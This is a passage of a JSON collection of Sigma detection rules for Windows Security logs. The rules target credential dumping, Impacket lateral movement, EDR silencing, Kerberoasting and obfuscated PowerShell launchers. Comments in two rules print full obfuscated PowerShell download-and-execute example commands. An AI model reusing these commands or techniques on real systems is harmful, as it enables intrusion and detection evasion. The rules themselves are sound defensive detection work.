    "content": "title: DPAPI Domain Master Key Backup Attempt\nid: 39a94fd1-8c9a-4ff6-bf22-c058762f8014\nstatus: test\ndescription: Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2023-03-15\ntags:\n    - attack.credential-access\n    - attack.t1003.004\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4692\n    condition: selection\nfalsepositives:\n    - If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_external_device.yml",
    "content": "title: External Disk Drive Or USB Storage Device Was Recognized By The System\nid: f69a87ea-955e-4fb4-adb2-bb9fd6685632\nstatus: test\ndescription: Detects external disk drives or plugged-in USB devices.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416\nauthor: Keith Wright\ndate: 2019-11-20\nmodified: 2024-02-09\ntags:\n    - attack.t1091\n    - attack.t1200\n    - attack.lateral-movement\n    - attack.initial-access\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 6416\n    selection_field:\n        - ClassName: 'DiskDrive'\n        - DeviceDescription: 'USB Mass Storage Device'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml",
    "content": "title: Persistence and Execution at Scale via GPO Scheduled Task\nid: a8f29a7b-b137-4446-80a0-b804272f3da2\nstatus: test\ndescription: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale\nreferences:\n    - https://twitter.com/menasec1/status/1106899890377052160\n    - https://www.secureworks.com/blog/ransomware-as-a-distraction\n    - https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-09-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection_5136:\n        EventID: 5136\n        AttributeLDAPDisplayName:\n            - 'gPCMachineExtensionNames'\n            - 'gPCUserExtensionNames'\n        AttributeValue|contains:\n            - 'CAB54552-DEEA-4691-817E-ED4A4D1AFC72'\n            - 'AADCED64-746C-4633-A97C-D61349046527'\n    selection_5145:\n        EventID: 5145\n        ShareName|endswith: '\\SYSVOL' # looking for the string \\\\*\\SYSVOL\n        RelativeTargetName|endswith: 'ScheduledTasks.xml'\n        AccessList|contains:\n            - 'WriteData'\n            - '%%4417'\n    condition: 1 of selection_*\nfalsepositives:\n    - If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduled tasks.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hidden_user_creation.yml",
    "content": "title: Hidden Local User Creation\nid: 7b449a5e-1db5-4dd0-a2dc-4e3a67282538\nstatus: test\ndescription: Detects the creation of a local hidden user account which should not happen for event ID 4720.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387743867663958021\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-03\nmodified: 2024-01-16\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n        TargetUserName|endswith: '$'\n    filter_main_homegroup:\n        TargetUserName: 'HomeGroupUser$'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hktl_edr_silencer.yml",
    "content": "title: HackTool - EDRSilencer Execution - Filter Added\nid: 98054878-5eab-434c-85d4-72d4e5a3361b\nstatus: test\ndescription: |\n    Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\nauthor: Thodoris Polyzos (@SmoothDeploy)\ndate: 2024-01-29\nmodified: 2024-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled'\ndetection:\n    selection:\n        EventID:\n            - 5441\n            - 5447\n        FilterName|contains: 'Custom Outbound Filter'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hktl_nofilter.yml",
    "content": "title: HackTool - NoFilter Execution\nid: 7b14c76a-c602-4ae6-9717-eff868153fc0\nstatus: test\ndescription: |\n    Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators\nreferences:\n    - https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp\n    - https://github.com/deepinstinct/NoFilter\n    - https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\n    - https://x.com/_st0pp3r_/status/1742203752361128162?s=20\nauthor: Stamatis Chatzimangou (st0pp3r)\ndate: 2024-01-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134\n    - attack.t1134.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled'\ndetection:\n    selection_5447:\n        EventID: 5447\n        FilterName|contains: 'RonPolicy'\n    selection_5449:\n        EventID: 5449\n        ProviderContextName|contains: 'RonPolicy'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml",
    "content": "title: HybridConnectionManager Service Installation\nid: 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2\nstatus: test\ndescription: Rule to detect the Hybrid Connection Manager service installation.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName: HybridConnectionManager\n        ServiceFileName|contains: HybridConnectionManager\n    condition: selection\nfalsepositives:\n    - Legitimate use of Hybrid Connection Manager via Azure function apps.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_impacket_psexec.yml",
    "content": "title: Impacket PsExec Execution\nid: 32d56ea1-417f-44ff-822b-882873f5f43b\nstatus: test\ndescription: Detects execution of Impacket's psexec.py.\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Bhabesh Raj\ndate: 2020-12-14\nmodified: 2022-09-22\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName|contains:\n            - 'RemCom_stdin'\n            - 'RemCom_stdout'\n            - 'RemCom_stderr'\n    condition: selection1\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_impacket_secretdump.yml",
    "content": "title: Possible Impacket SecretDump Remote Activity\nid: 252902e3-5830-4cf6-bf21-c22083dfd5cf\nstatus: test\ndescription: Detect AD credential dumping using impacket secretdump HKTL\nreferences:\n    - https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nauthor: Samir Bousseaden, wagga\ndate: 2019-04-03\nmodified: 2022-08-11\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\ADMIN$'  # looking for the string  \\\\*\\ADMIN$\n        RelativeTargetName|contains|all:\n            - 'SYSTEM32\\'\n            - '.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - Security\nid: 4edf51e1-cb83-4e1a-bc39-800e396068e3\nrelated:\n    - id: f7385ee2-0e0c-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - Security\nid: fd0f5778-d3cb-4c9a-9695-66759d04702a\nrelated:\n    - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\n      type: derived\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_servicefilename:\n        - ServiceFileName|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ServiceFileName|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ServiceFileName|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ServiceFileName|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ServiceFileName|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ServiceFileName|re: '\\$VerbosePreference\\.ToString\\('\n        - ServiceFileName|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - Security\nid: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974\nrelated:\n    - id: 72862bf2-0eb1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - 'powershell'\n    selection2:\n        ServiceFileName|contains:\n            - '${input}'\n            - 'noexit'\n    selection3:\n        ServiceFileName|contains:\n            - ' /c '\n            - ' /r '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - Security\nid: dcf2db1f-f091-425b-a821-c05875b8925a\nrelated:\n    - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        # ServiceFileName|re: 'cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - '\"set'\n            - '-f'\n        ServiceFileName|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - Security\nid: 7a922f1b-2635-4d6c-91ef-af228b198ad3\nrelated:\n    - id: 175997c5-803c-4b08-8bb0-70b099f47595\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n            - 'readtoend'\n        ServiceFileName|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - Security\nid: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca\nrelated:\n    - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - Security\nid: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1\nrelated:\n    - id: 487c7524-f892-4054-b263-8a0ace63fc25\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'set'\n            - '&&'\n        ServiceFileName|contains:\n            - 'environment'\n            - 'invoke'\n            - '${input)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - Security\nid: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6\nrelated:\n    - id: 63e3365d-4824-42d8-8b82-e56810fefa0c\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - Security\nid: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a\nrelated:\n    - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - 'window.close'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - Security\nid: cd0f7229-d16f-42de-8fe3-fba365fbcb3a\nrelated:\n    - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ServiceFileName|contains:\n            - value\n            - invoke\n            - comspec\n            - iex\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security\nid: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30\nrelated:\n    - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        # ServiceFileName|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        ServiceFileName|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        ServiceFileName|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_iso_mount.yml",
    "content": "title: ISO Image Mounted\nid: 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073\nstatus: test\ndescription: Detects the mount of an ISO image on an endpoint\nreferences:\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\n    - https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages\n    - https://twitter.com/MsftSecIntel/status/1257324139515269121\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nauthor: Syed Hasan (@syedhasan009)\ndate: 2021-05-29\nmodified: 2023-11-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Removable Storage\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectServer: 'Security'\n        ObjectType: 'File'\n        ObjectName|startswith: '\\Device\\CdRom'\n    filter_main_generic:\n        ObjectName:\n            - '\\Device\\CdRom0\\autorun.ico'\n            - '\\Device\\CdRom0\\setup.exe'\n            - '\\Device\\CdRom0\\setup64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Software installation ISO files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberoasting_activity.yml",
    "content": "title: Kerberoasting Activity - Initial Query\nid: d04ae2b8-ad54-4de0-bd87-4bc1da66aa59\nstatus: test\ndescription: |\n    This rule will collect the data needed to start looking into possible kerberoasting activity.\n    Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\n    You can then set a threshold for the number of requests and time between the requests to turn this into an alert.\nreferences:\n    - https://www.trustedsec.com/blog/art_of_kerberoast/\n    - https://adsecurity.org/?p=3513\nauthor: '@kostastsale'\ndate: 2022-01-21\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4769\n        Status: '0x0' # Translated as status from failure code field. Query only for successes\n        TicketEncryptionType: '0x17' # RC4 ticket encryption type\n    filter_main_krbtgt:\n        ServiceName|endswith:\n            - 'krbtgt' # Ignore requests for the krbtgt service\n            - '$' # Ignore requests from service names that end with $ which are associated with genuine kerberos traffic\n    filter_main_machine_accounts:\n        TargetUserName|contains: '$@' # Ignore requests from machines\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legacy applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberos_asrep_roasting.yml",
    "content": "title: Potential AS-REP Roasting via Kerberos TGT Requests\nid: 3e2f1b2c-4d5e-11ee-be56-0242ac120002\nstatus: experimental\ndescription: |\n    Detects suspicious Kerberos TGT requests with pre-authentication disabled (Pre-Authentication Type = 0) and Ticket Encryption Type (0x17) i.e, RC4-HMAC.\n    This may indicate an AS-REP Roasting attack, where attackers request AS-REP messages for accounts without pre-authentication and attempt to crack the encrypted ticket offline to recover user passwords.\nreferences:\n    - https://medium.com/system-weakness/detecting-as-rep-roasting-attacks-b5b3965f9714\n    - https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004\nauthor: ANosir\ndate: 2025-05-22\nmodified: 2025-07-04\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        TicketEncryptionType: '0x17'\n        ServiceName: 'krbtgt'\n        PreAuthType: 0\n    condition: selection\nfalsepositives:\n    - Legacy systems or applications that legitimately use RC4 encryption\n    - Misconfigured accounts with pre-authentication disabled\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberos_coercion_via_dns_object.yml",
    "content": "title: Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation\nid: b07e58cf-cacc-4135-8473-ccb2eba63dd2\nrelated:\n    - id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: 5588576c-5898-4fac-bcdd-7475a60e8f43 # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing - Network\n      type: similar\n    - id: 0ed99dda-6a35-11ef-8c99-0242ac120002 # Kerberos Coercion Via DNS SPN Spoofing Attempt\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to DNS records in Active Directory where the Distinguished Name (DN) contains a base64-encoded blob\n    matching the pattern \"1UWhRCAAAAA...BAAAA\". This pattern corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure,\n    commonly used in Kerberos coercion attacks. Adversaries may exploit this to coerce victim systems into authenticating to\n    attacker-controlled hosts by spoofing SPNs via DNS. It is one of the strong indicators of a Kerberos coercion attack,.\n    where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\n    Please investigate the user account that made the changes, as it is likely a low-privileged account that has been compromised.\nreferences:\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - 